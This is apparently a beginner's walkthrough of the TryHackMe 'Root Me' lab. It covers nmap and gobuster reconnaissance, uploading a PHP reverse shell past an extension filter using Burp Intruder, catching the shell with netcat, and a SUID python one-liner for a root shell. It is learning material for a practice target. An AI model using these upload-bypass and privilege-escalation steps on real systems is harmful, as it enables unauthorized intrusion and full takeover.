THM — Root Me
Nmap, gobuster, php reverseshell, netcat, burpsuite, find,gtfobins
Nmap
kali@kali:~$ sudo nmap -T4 -A 10.10.216.110
[sudo] password for kali:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-22 05:00 EST
Nmap scan report for 10.10.216.110
Host is up (0.41s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 4a:b9:16:08:84:c2:54:48:ba:5c:fd:3f:22:5f:22:14 (RSA)
| 256 a9:a6:86:e8:ec:96:c3:f0:03:cd:16:d5:49:73:d0:82 (ECDSA)
|_ 256 22:f6:b5:a6:54:d9:78:7c:26:03:5a:95:f3:f9:df:cd (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: HackIT - Home
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=11/22%OT=22%CT=1%CU=37299%PV=Y%DS=4%DC=T%G=Y%TM=5FBA36
OS:FD%P=x86_64-pc-linux-gnu)SEQ(SP=107%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)OP
OS:S(O1=M508ST11NW6%O2=M508ST11NW6%O3=M508NNT11NW6%O4=M508ST11NW6%O5=M508ST
OS:11NW6%O6=M508ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)EC
OS:N(R=Y%DF=Y%T=40%W=F507%O=M508NNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=
OS:AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%
OS:F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N
OS:%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%C
OS:D=S)Network Distance: 4 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 1723/tcp)
HOP RTT ADDRESS
1 96.86 ms 10.4.0.1
2 ... 3
4 422.98 ms 10.10.216.110OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.74 seconds
Gobuster
Explore web directories.
/ -> root page
/panel
Since this web is running on PHP, we can try to upload a PHP reverse shell.
https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
Remember to set the correct listening port (the NC listener port you are listening to) and IP address (your THM VPN IP).
It works when I upload a .txt file
We can check our uploaded file at the/uploads/ directory
Let’s check google what other PHP extensions we can try to upload with.
We can use burpsuite to check which file extension we can use to upload.
Send the request to the intruder. Highlight “txt”.
Add the different extensions in the payload section.
By checking the response we can see that other than PHP, all other extensions are successful.
Let’s change the extension and re-upload our file.
Set your NC listener.
Next click on the file you uploaded, and you should see a response on your terminal.
Now to finduser.txt
$ find / -type f -name user.txt
$ find / -type f -name user.txt 2>/dev/nullYou can add on a 2>/dev/null to move all the standard error to the /dev/null directory. This will filter out results that do not have an error.
Next, simply cat out the contents to get the user flag.
Privilege Escalation
Use this command to find SUID files:
find / -user root -perm /4000To be honest, as I am still a beginner I am not able to tell which file we should take notice of, but have to look through other people’s writeup to understand why.
I have highlighted below the file we will be looking into, which is the /usr/bin/python
$ find / -user root -perm /4000 2>/dev/null
find / -user root -perm /4000 2>/dev/null/
bash: /dev/null/: Is a directory
bash-4.4$ find / -user root -perm /4000 2>/dev/null
find / -user root -perm /4000 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/bin/traceroute6.iputils
/usr/bin/newuidmap
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/python
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/pkexec
/snap/core/8268/bin/mount
/snap/core/8268/bin/ping
/snap/core/8268/bin/ping6
/snap/core/8268/bin/su
/snap/core/8268/bin/umount
/snap/core/8268/usr/bin/chfn
/snap/core/8268/usr/bin/chsh
/snap/core/8268/usr/bin/gpasswd
/snap/core/8268/usr/bin/newgrp
/snap/core/8268/usr/bin/passwd
/snap/core/8268/usr/bin/sudo
/snap/core/8268/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/8268/usr/lib/openssh/ssh-keysign
/snap/core/8268/usr/lib/snapd/snap-confine
/snap/core/8268/usr/sbin/pppd
/snap/core/9665/bin/mount
/snap/core/9665/bin/ping
/snap/core/9665/bin/ping6
/snap/core/9665/bin/su
/snap/core/9665/bin/umount
/snap/core/9665/usr/bin/chfn
/snap/core/9665/usr/bin/chsh
/snap/core/9665/usr/bin/gpasswd
/snap/core/9665/usr/bin/newgrp
/snap/core/9665/usr/bin/passwd
/snap/core/9665/usr/bin/sudo
/snap/core/9665/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/9665/usr/lib/openssh/ssh-keysign
/snap/core/9665/usr/lib/snapd/snap-confine
/snap/core/9665/usr/sbin/pppd
/bin/mount
/bin/su
/bin/fusermount
/bin/ping
/bin/umountGTFObins is a great resource to search for binaries that can be exploited.
Below is a screenshot from gtfobins website.
Based on the above instruction, we have to use the command:
/usr/bin/python -c 'import os; os.execl("/bin/sh", "sh", "-p")'With the command above, we are able to get a root shell.
To find the root flag.
You can use the find command or you should have known that the root.txt file is probably kept in the root directory.
